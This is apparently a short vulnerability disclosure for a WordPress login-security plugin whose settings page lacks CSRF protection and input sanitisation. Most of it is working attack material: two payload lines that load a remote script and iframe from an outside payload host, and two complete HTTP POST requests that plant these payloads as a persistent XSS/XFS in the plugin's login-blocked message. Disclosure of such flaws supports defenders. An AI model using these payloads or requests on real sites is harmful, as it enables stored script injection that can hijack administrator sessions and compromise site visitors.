The plugin did not have CSRF check when saving its settings, not any sanitisation or validation on them. This could allow attackers to make logged in administrators change the plugin’s settings to arbitrary values, and set XSS payloads on them as well
### -- [ Payloads: ]
[$] "><script src=https://m0ze.ru/payload/a.js></script>
[$] "><iframe src=https://m0ze.ru/payload/xfsii.html></iframe>
### -- [ PoC #1 | Authenticated Persistent XSS & XFS | Blocker page message: ]
[!] POST /wp-admin/options-general.php?page=wp_login_security_and_history.php&page_num=%22+onmouseover%3Dalert%28%29+1&tab=2 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 252
Cookie: [admin cookies]
can_show_captcha_option=1&show_captcha_count_option=1337&can_block_login_trials=1&login_max_trials=1337&login_block_time=13&login_blocked_msg=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E&Save_Options=++Update+Options++
### -- [ PoC #2 | Authenticated Persistent XSS & XFS | Blocker page message: ]
[!] POST /wp-admin/options-general.php?page=wp_login_security_and_history.php&page_num=%22+onmouseover%3Dalert%28%29+1&tab=2 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 258
Cookie: [admin cookies]
can_show_captcha_option=1&show_captcha_count_option=1337&can_block_login_trials=1&login_max_trials=1337&login_block_time=13&login_blocked_msg=%22%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E&Save_Options=++Update+Options++